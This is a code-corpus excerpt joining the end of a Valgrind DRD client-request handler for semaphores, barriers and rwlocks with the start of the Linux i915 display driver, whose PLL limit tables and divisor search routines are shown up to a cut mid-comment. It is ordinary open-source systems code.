      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(semaphore_pre_wait)(arg[1]);
      break;

   case VG_USERREQ__POST_SEM_WAIT:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(semaphore_post_wait)(drd_tid, arg[1], arg[2]);
      break;

   case VG_USERREQ__PRE_SEM_POST:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(semaphore_pre_post)(drd_tid, arg[1]);
      break;

   case VG_USERREQ__POST_SEM_POST:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(semaphore_post_post)(drd_tid, arg[1], arg[2]);
      break;

   /* Barrier requests. */
   case VG_USERREQ__PRE_BARRIER_INIT:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(barrier_init)(arg[1], arg[2], arg[3], arg[4]);
      break;

   case VG_USERREQ__POST_BARRIER_INIT:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   case VG_USERREQ__PRE_BARRIER_DESTROY:
      DRD_(thread_enter_synchr)(drd_tid);
      break;

   case VG_USERREQ__POST_BARRIER_DESTROY:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(barrier_destroy)(arg[1], arg[2]);
      break;

   case VG_USERREQ__PRE_BARRIER_WAIT:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(barrier_pre_wait)(drd_tid, arg[1], arg[2]);
      break;

   case VG_USERREQ__POST_BARRIER_WAIT:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(barrier_post_wait)(drd_tid, arg[1], arg[2], arg[3], arg[4]);
      break;

   /* POSIX rwlock requests. */
   case VG_USERREQ__PRE_RWLOCK_INIT:
      DRD_(rwlock_pre_init)(arg[1], pthread_rwlock);
      break;

   case VG_USERREQ__POST_RWLOCK_DESTROY:
      DRD_(rwlock_post_destroy)(arg[1], pthread_rwlock);
      break;

   case VG_USERREQ__PRE_RWLOCK_RDLOCK:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(rwlock_pre_rdlock)(arg[1], pthread_rwlock);
      break;

   case VG_USERREQ__POST_RWLOCK_RDLOCK:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(rwlock_post_rdlock)(arg[1], pthread_rwlock, arg[2]);
      break;

   case VG_USERREQ__PRE_RWLOCK_WRLOCK:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(rwlock_pre_wrlock)(arg[1], pthread_rwlock);
      break;

   case VG_USERREQ__POST_RWLOCK_WRLOCK:
      if (DRD_(thread_leave_synchr)(drd_tid) == 0)
         DRD_(rwlock_post_wrlock)(arg[1], pthread_rwlock, arg[2]);
      break;

   case VG_USERREQ__PRE_RWLOCK_UNLOCK:
      if (DRD_(thread_enter_synchr)(drd_tid) == 0)
         DRD_(rwlock_pre_unlock)(arg[1], pthread_rwlock);
      break;

   case VG_USERREQ__POST_RWLOCK_UNLOCK:
      DRD_(thread_leave_synchr)(drd_tid);
      break;

   /* Miscellaneous requests. */
   case VG_USERREQ__DRD_CLEAN_MEMORY:
      if (arg[2] > 0)
         DRD_(clean_memory)(arg[1], arg[2]);
      break;

   case VG_USERREQ__HELGRIND_ANNOTATION_UNIMP:
   {
      /* Note: it is assumed below that the text arg[1] points to is never
       * freed, e.g. because it points to static data.
       */
      UnimpClReqInfo UICR =
         { DRD_(thread_get_running_tid)(), (Char*)arg[1] };
      VG_(maybe_record_error)(vg_tid,
                              UnimpHgClReq,
                              VG_(get_IP)(vg_tid),
                              "",
                              &UICR);
   }
   break;

   case VG_USERREQ__DRD_ANNOTATION_UNIMP:
   {
      /* Note: it is assumed below that the text arg[1] points to is never
       * freed, e.g. because it points to static data.
       */
      UnimpClReqInfo UICR =
         { DRD_(thread_get_running_tid)(), (Char*)arg[1] };
      VG_(maybe_record_error)(vg_tid,
                              UnimpDrdClReq,
                              VG_(get_IP)(vg_tid),
                              "",
                              &UICR);
   }
   break;

   default:
#if 0
      VG_(message)(Vg_DebugMsg, "Unrecognized client request 0x%lx 0x%lx",
                   arg[0], arg[1]);
      tl_assert(0);
#endif
      return False;
   }

   *ret = result;
   return True;
}
| gpl-2.0 |
gshwang/kernel-3.1.4 | drivers/gpu/drm/i915/intel_display.c | 3 | 239957 | /*
* Copyright © 2006-2007 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
* DEALINGS IN THE SOFTWARE.
*
* Authors:
* Eric Anholt <eric@anholt.net>
*/
#include <linux/cpufreq.h>
#include <linux/module.h>
#include <linux/input.h>
#include <linux/i2c.h>
#include <linux/kernel.h>
#include <linux/slab.h>
#include <linux/vgaarb.h>
#include "drmP.h"
#include "intel_drv.h"
#include "i915_drm.h"
#include "i915_drv.h"
#include "i915_trace.h"
#include "drm_dp_helper.h"
#include "drm_crtc_helper.h"
#define HAS_eDP (intel_pipe_has_type(crtc, INTEL_OUTPUT_EDP))
bool intel_pipe_has_type (struct drm_crtc *crtc, int type);
static void intel_update_watermarks(struct drm_device *dev);
static void intel_increase_pllclock(struct drm_crtc *crtc);
static void intel_crtc_update_cursor(struct drm_crtc *crtc, bool on);
/* PLL state: the programmed divider values plus the values derived
 * from them for a candidate clock configuration. */
typedef struct {
	/* given values */
	int n;
	int m1, m2;
	int p1, p2;
	/* derived values */
	int dot;
	int vco;
	int m;
	int p;
} intel_clock_t;

/* Inclusive [min, max] range for one PLL parameter. */
typedef struct {
	int min, max;
} intel_range_t;

/* Post-divider selection: dot clocks below dot_limit use p2_slow,
 * faster ones use p2_fast. */
typedef struct {
	int	dot_limit;
	int	p2_slow, p2_fast;
} intel_p2_t;

#define INTEL_P2_NUM		      2
typedef struct intel_limit intel_limit_t;

/* Per-platform PLL parameter limits plus the matching search routine. */
struct intel_limit {
	intel_range_t   dot, vco, n, m, m1, m2, p, p1;
	intel_p2_t	    p2;
	bool (* find_pll)(const intel_limit_t *, struct drm_crtc *,
			  int, int, intel_clock_t *);
};
/* FDI */
#define IRONLAKE_FDI_FREQ 2700000 /* in kHz for mode->clock */
static bool
intel_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static bool
intel_g4x_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static bool
intel_find_pll_g4x_dp(const intel_limit_t *, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static bool
intel_find_pll_ironlake_dp(const intel_limit_t *, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
/* FDI link frequency, in units of 100MHz. */
static inline u32
intel_fdi_link_freq(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv;

	if (!IS_GEN5(dev))
		return 27;

	dev_priv = dev->dev_private;
	return (I915_READ(FDI_PLL_BIOS_0) & FDI_PLL_FB_CLOCK_MASK) + 2;
}
/* Gen2 (i8xx) PLL limits for DVO outputs. */
static const intel_limit_t intel_limits_i8xx_dvo = {
	.dot = { .min = 25000, .max = 350000 },
	.vco = { .min = 930000, .max = 1400000 },
	.n = { .min = 3, .max = 16 },
	.m = { .min = 96, .max = 140 },
	.m1 = { .min = 18, .max = 26 },
	.m2 = { .min = 6, .max = 16 },
	.p = { .min = 4, .max = 128 },
	.p1 = { .min = 2, .max = 33 },
	.p2 = { .dot_limit = 165000,
		.p2_slow = 4, .p2_fast = 2 },
	.find_pll = intel_find_best_PLL,
};

/* Gen2 (i8xx) PLL limits for LVDS panels. */
static const intel_limit_t intel_limits_i8xx_lvds = {
	.dot = { .min = 25000, .max = 350000 },
	.vco = { .min = 930000, .max = 1400000 },
	.n = { .min = 3, .max = 16 },
	.m = { .min = 96, .max = 140 },
	.m1 = { .min = 18, .max = 26 },
	.m2 = { .min = 6, .max = 16 },
	.p = { .min = 4, .max = 128 },
	.p1 = { .min = 1, .max = 6 },
	.p2 = { .dot_limit = 165000,
		.p2_slow = 14, .p2_fast = 7 },
	.find_pll = intel_find_best_PLL,
};

/* Gen3/4 (i9xx) PLL limits for SDVO outputs. */
static const intel_limit_t intel_limits_i9xx_sdvo = {
	.dot = { .min = 20000, .max = 400000 },
	.vco = { .min = 1400000, .max = 2800000 },
	.n = { .min = 1, .max = 6 },
	.m = { .min = 70, .max = 120 },
	.m1 = { .min = 10, .max = 22 },
	.m2 = { .min = 5, .max = 9 },
	.p = { .min = 5, .max = 80 },
	.p1 = { .min = 1, .max = 8 },
	.p2 = { .dot_limit = 200000,
		.p2_slow = 10, .p2_fast = 5 },
	.find_pll = intel_find_best_PLL,
};

/* Gen3/4 (i9xx) PLL limits for LVDS panels. */
static const intel_limit_t intel_limits_i9xx_lvds = {
	.dot = { .min = 20000, .max = 400000 },
	.vco = { .min = 1400000, .max = 2800000 },
	.n = { .min = 1, .max = 6 },
	.m = { .min = 70, .max = 120 },
	.m1 = { .min = 10, .max = 22 },
	.m2 = { .min = 5, .max = 9 },
	.p = { .min = 7, .max = 98 },
	.p1 = { .min = 1, .max = 8 },
	.p2 = { .dot_limit = 112000,
		.p2_slow = 14, .p2_fast = 7 },
	.find_pll = intel_find_best_PLL,
};

/* G4x PLL limits for SDVO outputs. */
static const intel_limit_t intel_limits_g4x_sdvo = {
	.dot = { .min = 25000, .max = 270000 },
	.vco = { .min = 1750000, .max = 3500000},
	.n = { .min = 1, .max = 4 },
	.m = { .min = 104, .max = 138 },
	.m1 = { .min = 17, .max = 23 },
	.m2 = { .min = 5, .max = 11 },
	.p = { .min = 10, .max = 30 },
	.p1 = { .min = 1, .max = 3},
	.p2 = { .dot_limit = 270000,
		.p2_slow = 10,
		.p2_fast = 10
	},
	.find_pll = intel_g4x_find_best_PLL,
};

/* G4x PLL limits for HDMI outputs. */
static const intel_limit_t intel_limits_g4x_hdmi = {
	.dot = { .min = 22000, .max = 400000 },
	.vco = { .min = 1750000, .max = 3500000},
	.n = { .min = 1, .max = 4 },
	.m = { .min = 104, .max = 138 },
	.m1 = { .min = 16, .max = 23 },
	.m2 = { .min = 5, .max = 11 },
	.p = { .min = 5, .max = 80 },
	.p1 = { .min = 1, .max = 8},
	.p2 = { .dot_limit = 165000,
		.p2_slow = 10, .p2_fast = 5 },
	.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_single_channel_lvds = {
.dot = { .min = 20000, .max = 115000 },
.vco = { .min = 1750000, .max = 3500000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 104, .max = 138 },
.m1 = { .min = 17, .max = 23 },
.m2 = { .min = 5, .max = 11 },
.p = { .min = 28, .max = 112 },
.p1 = { .min = 2, .max = 8 },
.p2 = { .dot_limit = 0,
.p2_slow = 14, .p2_fast = 14
},
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_dual_channel_lvds = {
.dot = { .min = 80000, .max = 224000 },
.vco = { .min = 1750000, .max = 3500000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 104, .max = 138 },
.m1 = { .min = 17, .max = 23 },
.m2 = { .min = 5, .max = 11 },
.p = { .min = 14, .max = 42 },
.p1 = { .min = 2, .max = 6 },
.p2 = { .dot_limit = 0,
.p2_slow = 7, .p2_fast = 7
},
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_display_port = {
.dot = { .min = 161670, .max = 227000 },
.vco = { .min = 1750000, .max = 3500000},
.n = { .min = 1, .max = 2 },
.m = { .min = 97, .max = 108 },
.m1 = { .min = 0x10, .max = 0x12 },
.m2 = { .min = 0x05, .max = 0x06 },
.p = { .min = 10, .max = 20 },
.p1 = { .min = 1, .max = 2},
.p2 = { .dot_limit = 0,
.p2_slow = 10, .p2_fast = 10 },
.find_pll = intel_find_pll_g4x_dp,
};
static const intel_limit_t intel_limits_pineview_sdvo = {
.dot = { .min = 20000, .max = 400000},
.vco = { .min = 1700000, .max = 3500000 },
/* Pineview's Ncounter is a ring counter */
.n = { .min = 3, .max = 6 },
.m = { .min = 2, .max = 256 },
/* Pineview only has one combined m divider, which we treat as m2. */
.m1 = { .min = 0, .max = 0 },
.m2 = { .min = 0, .max = 254 },
.p = { .min = 5, .max = 80 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 200000,
.p2_slow = 10, .p2_fast = 5 },
.find_pll = intel_find_best_PLL,
};
static const intel_limit_t intel_limits_pineview_lvds = {
.dot = { .min = 20000, .max = 400000 },
.vco = { .min = 1700000, .max = 3500000 },
.n = { .min = 3, .max = 6 },
.m = { .min = 2, .max = 256 },
.m1 = { .min = 0, .max = 0 },
.m2 = { .min = 0, .max = 254 },
.p = { .min = 7, .max = 112 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 112000,
.p2_slow = 14, .p2_fast = 14 },
.find_pll = intel_find_best_PLL,
};
/* Ironlake / Sandybridge
 *
 * We calculate clock using (register_value + 2) for N/M1/M2, so here
 * the range value for them is (actual_value - 2).
 */
/* ILK/SNB limits for the analog DAC. */
static const intel_limit_t intel_limits_ironlake_dac = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 5 },
.m = { .min = 79, .max = 127 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 5, .max = 80 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 10, .p2_fast = 5 },
.find_pll = intel_g4x_find_best_PLL,
};
/* ILK/SNB limits for single-channel LVDS, 120MHz refclk. */
static const intel_limit_t intel_limits_ironlake_single_lvds = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 79, .max = 118 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 28, .max = 112 },
.p1 = { .min = 2, .max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 14, .p2_fast = 14 },
.find_pll = intel_g4x_find_best_PLL,
};
/* ILK/SNB limits for dual-channel LVDS, 120MHz refclk. */
static const intel_limit_t intel_limits_ironlake_dual_lvds = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 79, .max = 127 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 14, .max = 56 },
.p1 = { .min = 2, .max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 7, .p2_fast = 7 },
.find_pll = intel_g4x_find_best_PLL,
};
/* LVDS 100mhz refclk limits. */
static const intel_limit_t intel_limits_ironlake_single_lvds_100m = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 2 },
.m = { .min = 79, .max = 126 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 28, .max = 112 },
.p1 = { .min = 2,.max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 14, .p2_fast = 14 },
.find_pll = intel_g4x_find_best_PLL,
};
/* Dual-channel LVDS with 100MHz (SSC) refclk. */
static const intel_limit_t intel_limits_ironlake_dual_lvds_100m = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 79, .max = 126 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 14, .max = 42 },
.p1 = { .min = 2,.max = 6 },
.p2 = { .dot_limit = 225000,
.p2_slow = 7, .p2_fast = 7 },
.find_pll = intel_g4x_find_best_PLL,
};
/* ILK+ limits for DisplayPort/eDP (fixed divisor tables in find_pll). */
static const intel_limit_t intel_limits_ironlake_display_port = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000},
.n = { .min = 1, .max = 2 },
.m = { .min = 81, .max = 90 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 10, .max = 20 },
.p1 = { .min = 1, .max = 2},
.p2 = { .dot_limit = 0,
.p2_slow = 10, .p2_fast = 10 },
.find_pll = intel_find_pll_ironlake_dp,
};
static const intel_limit_t *intel_ironlake_limit(struct drm_crtc *crtc,
int refclk)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
const intel_limit_t *limit;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
if ((I915_READ(PCH_LVDS) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP) {
/* LVDS dual channel */
if (refclk == 100000)
limit = &intel_limits_ironlake_dual_lvds_100m;
else
limit = &intel_limits_ironlake_dual_lvds;
} else {
if (refclk == 100000)
limit = &intel_limits_ironlake_single_lvds_100m;
else
limit = &intel_limits_ironlake_single_lvds;
}
} else if (intel_pipe_has_type(crtc, INTEL_OUTPUT_DISPLAYPORT) ||
HAS_eDP)
limit = &intel_limits_ironlake_display_port;
else
limit = &intel_limits_ironlake_dac;
return limit;
}
/*
 * Select the PLL limit table for a G4X crtc based on the attached
 * output type; LVDS channel mode is read from the LVDS register.
 */
static const intel_limit_t *intel_g4x_limit(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
const intel_limit_t *limit;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
if ((I915_READ(LVDS) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP)
/* LVDS with dual channel */
limit = &intel_limits_g4x_dual_channel_lvds;
else
/* LVDS with single channel */
limit = &intel_limits_g4x_single_channel_lvds;
} else if (intel_pipe_has_type(crtc, INTEL_OUTPUT_HDMI) ||
intel_pipe_has_type(crtc, INTEL_OUTPUT_ANALOG)) {
limit = &intel_limits_g4x_hdmi;
} else if (intel_pipe_has_type(crtc, INTEL_OUTPUT_SDVO)) {
limit = &intel_limits_g4x_sdvo;
} else if (intel_pipe_has_type (crtc, INTEL_OUTPUT_DISPLAYPORT)) {
limit = &intel_limits_g4x_display_port;
} else /* The option is for other outputs */
limit = &intel_limits_i9xx_sdvo;
return limit;
}
/*
 * Top-level limit-table dispatch: pick the divisor limits for @crtc by
 * platform generation, delegating to the ILK and G4X helpers where those
 * platforms need extra logic.
 */
static const intel_limit_t *intel_limit(struct drm_crtc *crtc, int refclk)
{
	struct drm_device *dev = crtc->dev;

	if (HAS_PCH_SPLIT(dev))
		return intel_ironlake_limit(crtc, refclk);

	if (IS_G4X(dev))
		return intel_g4x_limit(crtc);

	if (IS_PINEVIEW(dev))
		return intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) ?
			&intel_limits_pineview_lvds :
			&intel_limits_pineview_sdvo;

	if (!IS_GEN2(dev))
		return intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) ?
			&intel_limits_i9xx_lvds :
			&intel_limits_i9xx_sdvo;

	return intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) ?
		&intel_limits_i8xx_lvds :
		&intel_limits_i8xx_dvo;
}
/* m1 is reserved as 0 in Pineview, n is a ring counter */
/*
 * Compute derived clock values (m, p, vco, dot) from the raw divisors
 * for Pineview, which has a single combined m divider held in m2.
 * NOTE: integer division — the evaluation order here is significant.
 */
static void pineview_clock(int refclk, intel_clock_t *clock)
{
clock->m = clock->m2 + 2;
clock->p = clock->p1 * clock->p2;
clock->vco = refclk * clock->m / clock->n;
clock->dot = clock->vco / clock->p;
}
/*
 * Compute derived clock values (m, p, vco, dot) from the raw divisors.
 * The +2 offsets match the hardware register encoding for m1/m2/n
 * (see the Ironlake limit-table comment above). Pineview uses its own
 * formula. NOTE: integer division — evaluation order is significant.
 */
static void intel_clock(struct drm_device *dev, int refclk, intel_clock_t *clock)
{
if (IS_PINEVIEW(dev)) {
pineview_clock(refclk, clock);
return;
}
clock->m = 5 * (clock->m1 + 2) + (clock->m2 + 2);
clock->p = clock->p1 * clock->p2;
clock->vco = refclk * clock->m / (clock->n + 2);
clock->dot = clock->vco / clock->p;
}
/**
 * Returns whether any output on the specified pipe is of the specified type
 */
bool intel_pipe_has_type(struct drm_crtc *crtc, int type)
{
struct drm_device *dev = crtc->dev;
struct drm_mode_config *mode_config = &dev->mode_config;
struct intel_encoder *encoder;
/* Walk every encoder on the device; match ones driving this crtc. */
list_for_each_entry(encoder, &mode_config->encoder_list, base.head)
if (encoder->base.crtc == crtc && encoder->type == type)
return true;
return false;
}
#define INTELPllInvalid(s) do { /* DRM_DEBUG(s); */ return false; } while (0)
/**
 * Returns whether the given set of divisors are valid for a given refclk with
 * the given connectors. Each divisor and each derived value must fall inside
 * the [min, max] window of the supplied limit table.
 */
static bool intel_PLL_is_valid(struct drm_device *dev,
			       const intel_limit_t *limit,
			       const intel_clock_t *clock)
{
	if (clock->p1 < limit->p1.min || clock->p1 > limit->p1.max)
		INTELPllInvalid("p1 out of range\n");
	if (clock->p < limit->p.min || clock->p > limit->p.max)
		INTELPllInvalid("p out of range\n");
	if (clock->m2 < limit->m2.min || clock->m2 > limit->m2.max)
		INTELPllInvalid("m2 out of range\n");
	if (clock->m1 < limit->m1.min || clock->m1 > limit->m1.max)
		INTELPllInvalid("m1 out of range\n");
	/* m1 must exceed m2 everywhere except Pineview (m1 is unused there) */
	if (clock->m1 <= clock->m2 && !IS_PINEVIEW(dev))
		INTELPllInvalid("m1 <= m2\n");
	if (clock->m < limit->m.min || clock->m > limit->m.max)
		INTELPllInvalid("m out of range\n");
	if (clock->n < limit->n.min || clock->n > limit->n.max)
		INTELPllInvalid("n out of range\n");
	if (clock->vco < limit->vco.min || clock->vco > limit->vco.max)
		INTELPllInvalid("vco out of range\n");
	/* XXX: We may need to be checking "Dot clock" depending on the multiplier,
	 * connector, etc., rather than just a single range.
	 */
	if (clock->dot < limit->dot.min || clock->dot > limit->dot.max)
		INTELPllInvalid("dot out of range\n");
	return true;
}
/*
 * Exhaustive divisor search (pre-G4X): iterate all valid m1/m2/n/p1
 * combinations and keep the one whose resulting dot clock is closest to
 * @target. p2 is fixed up front from the LVDS channel state (or the
 * dot_limit threshold). Returns true iff any valid combination beat the
 * initial error of @target itself. The loop order determines which of
 * several equally-close candidates wins — do not reorder.
 */
static bool
intel_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
intel_clock_t clock;
int err = target;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) &&
(I915_READ(LVDS)) != 0) {
/*
 * For LVDS, if the panel is on, just rely on its current
 * settings for dual-channel. We haven't figured out how to
 * reliably set up different single/dual channel state, if we
 * even can.
 */
if ((I915_READ(LVDS) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP)
clock.p2 = limit->p2.p2_fast;
else
clock.p2 = limit->p2.p2_slow;
} else {
if (target < limit->p2.dot_limit)
clock.p2 = limit->p2.p2_slow;
else
clock.p2 = limit->p2.p2_fast;
}
memset (best_clock, 0, sizeof (*best_clock));
for (clock.m1 = limit->m1.min; clock.m1 <= limit->m1.max;
clock.m1++) {
for (clock.m2 = limit->m2.min;
clock.m2 <= limit->m2.max; clock.m2++) {
/* m1 is always 0 in Pineview */
if (clock.m2 >= clock.m1 && !IS_PINEVIEW(dev))
break;
for (clock.n = limit->n.min;
clock.n <= limit->n.max; clock.n++) {
for (clock.p1 = limit->p1.min;
clock.p1 <= limit->p1.max; clock.p1++) {
int this_err;
intel_clock(dev, refclk, &clock);
if (!intel_PLL_is_valid(dev, limit,
&clock))
continue;
/* Strict '<' keeps the first of equally good candidates. */
this_err = abs(clock.dot - target);
if (this_err < err) {
*best_clock = clock;
err = this_err;
}
}
}
}
}
return (err != target);
}
/*
 * Divisor search for G4X and ILK+: per hardware guidance, prefer the
 * smallest n (for precision) and the largest m1/m2/p1, accepting any
 * candidate within ~0.585% of @target. Once a candidate is found, max_n
 * is clamped to its n so later (larger-n) iterations are skipped.
 * The descending loop order encodes the preference — do not reorder.
 */
static bool
intel_g4x_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
intel_clock_t clock;
int max_n;
bool found;
/* approximately equals target * 0.00585 */
int err_most = (target >> 8) + (target >> 9);
found = false;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
int lvds_reg;
/* LVDS lives behind the PCH on ILK+ */
if (HAS_PCH_SPLIT(dev))
lvds_reg = PCH_LVDS;
else
lvds_reg = LVDS;
if ((I915_READ(lvds_reg) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP)
clock.p2 = limit->p2.p2_fast;
else
clock.p2 = limit->p2.p2_slow;
} else {
if (target < limit->p2.dot_limit)
clock.p2 = limit->p2.p2_slow;
else
clock.p2 = limit->p2.p2_fast;
}
memset(best_clock, 0, sizeof(*best_clock));
max_n = limit->n.max;
/* based on hardware requirement, prefer smaller n to precision */
for (clock.n = limit->n.min; clock.n <= max_n; clock.n++) {
/* based on hardware requirement, prefere larger m1,m2 */
for (clock.m1 = limit->m1.max;
clock.m1 >= limit->m1.min; clock.m1--) {
for (clock.m2 = limit->m2.max;
clock.m2 >= limit->m2.min; clock.m2--) {
for (clock.p1 = limit->p1.max;
clock.p1 >= limit->p1.min; clock.p1--) {
int this_err;
intel_clock(dev, refclk, &clock);
if (!intel_PLL_is_valid(dev, limit,
&clock))
continue;
this_err = abs(clock.dot - target);
if (this_err < err_most) {
*best_clock = clock;
err_most = this_err;
max_n = clock.n;
found = true;
}
}
}
}
}
return found;
}
/*
 * DisplayPort on ILK+ runs at one of two fixed link rates; pick the
 * canned divisor set for the requested rate and derive the rest via
 * intel_clock(). Always succeeds.
 */
static bool
intel_find_pll_ironlake_dp(const intel_limit_t *limit, struct drm_crtc *crtc,
			   int target, int refclk, intel_clock_t *best_clock)
{
	struct drm_device *dev = crtc->dev;
	intel_clock_t clock;
	bool low_rate = target < 200000;

	clock.p2 = 10;
	clock.n  = low_rate ? 1 : 2;
	clock.p1 = low_rate ? 2 : 1;
	clock.m1 = low_rate ? 12 : 14;
	clock.m2 = low_rate ? 9 : 8;

	intel_clock(dev, refclk, &clock);
	memcpy(best_clock, &clock, sizeof(intel_clock_t));
	return true;
}
/* DisplayPort has only two frequencies, 162MHz and 270MHz */
/*
 * Pick the canned G4X DisplayPort divisors for the requested link rate
 * and compute the derived values by hand (96MHz refclk, vco unused).
 * Always succeeds.
 */
static bool
intel_find_pll_g4x_dp(const intel_limit_t *limit, struct drm_crtc *crtc,
		      int target, int refclk, intel_clock_t *best_clock)
{
	intel_clock_t clock;
	bool low_rate = target < 200000;

	clock.p1 = low_rate ? 2 : 1;
	clock.p2 = 10;
	clock.n  = low_rate ? 2 : 1;
	clock.m1 = low_rate ? 23 : 14;
	clock.m2 = low_rate ? 8 : 2;

	/* Same derivation as intel_clock(); keep the division order. */
	clock.m = 5 * (clock.m1 + 2) + (clock.m2 + 2);
	clock.p = (clock.p1 * clock.p2);
	clock.dot = 96000 * clock.m / (clock.n + 2) / clock.p;
	clock.vco = 0;
	memcpy(best_clock, &clock, sizeof(intel_clock_t));
	return true;
}
/**
 * intel_wait_for_vblank - wait for vblank on a given pipe
 * @dev: drm device
 * @pipe: pipe to wait for
 *
 * Wait for vblank to occur on a given pipe. Needed for various bits of
 * mode setting code. Polls PIPESTAT with a 50ms timeout rather than
 * relying on the vblank interrupt.
 */
void intel_wait_for_vblank(struct drm_device *dev, int pipe)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int pipestat_reg = PIPESTAT(pipe);
/* Clear existing vblank status. Note this will clear any other
 * sticky status fields as well.
 *
 * This races with i915_driver_irq_handler() with the result
 * that either function could miss a vblank event. Here it is not
 * fatal, as we will either wait upon the next vblank interrupt or
 * timeout. Generally speaking intel_wait_for_vblank() is only
 * called during modeset at which time the GPU should be idle and
 * should *not* be performing page flips and thus not waiting on
 * vblanks...
 * Currently, the result of us stealing a vblank from the irq
 * handler is that a single frame will be skipped during swapbuffers.
 */
I915_WRITE(pipestat_reg,
I915_READ(pipestat_reg) | PIPE_VBLANK_INTERRUPT_STATUS);
/* Wait for vblank interrupt bit to set */
if (wait_for(I915_READ(pipestat_reg) &
PIPE_VBLANK_INTERRUPT_STATUS,
50))
DRM_DEBUG_KMS("vblank wait timed out\n");
}
/*
 * intel_wait_for_pipe_off - wait for pipe to turn off
 * @dev: drm device
 * @pipe: pipe to wait for
 *
